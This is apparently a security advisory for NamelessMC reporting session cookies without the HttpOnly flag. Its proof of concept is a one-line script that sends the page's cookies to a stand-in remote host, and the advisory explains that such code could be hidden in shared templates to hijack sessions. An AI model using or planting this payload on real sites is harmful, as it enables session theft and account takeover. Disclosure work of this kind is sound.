Sensitive Cookie Without 'HttpOnly' Flag in namelessmc/nameless
Oct 23rd 2021
Due to a culmination of factors in the design of the authentication and authorization system and a lack of proper cookie setting it is possible for a malicious user to exfiltrate session tokens from a NamelessMC instance and aggregate them in a remote service.
A malicious administrative user can use NamelessMC's built in template system to either maliciously inject arbitrary JS into a single instance, or they can create and distribute a template that administrative users on other instances may install.
This issue stems primarily from the lack of
HttpOnly being set on cookies and improper validation of the session to ensure a session cannot be shared with entity.
Proof of Concept
Edit the active template as an administrator, and add the following code to the
<script> fetch('https://example.com?referrer='+encodeURIComponent(window.location.href)+'&cookies='+document.cookie); </script>
Now, imagine someone creating a desirable template for the software and making it available for others to download. It would be trivial to hide such code within a template and anyone who installs it on their system would then be sending cookie values over the wire to an attacker controlled server. A user with a popular existing template could also make modifications and submit an update that others would then install.
This vulnerability allows a malicious actor to login as any user of the software once tokens have been exfiltrated.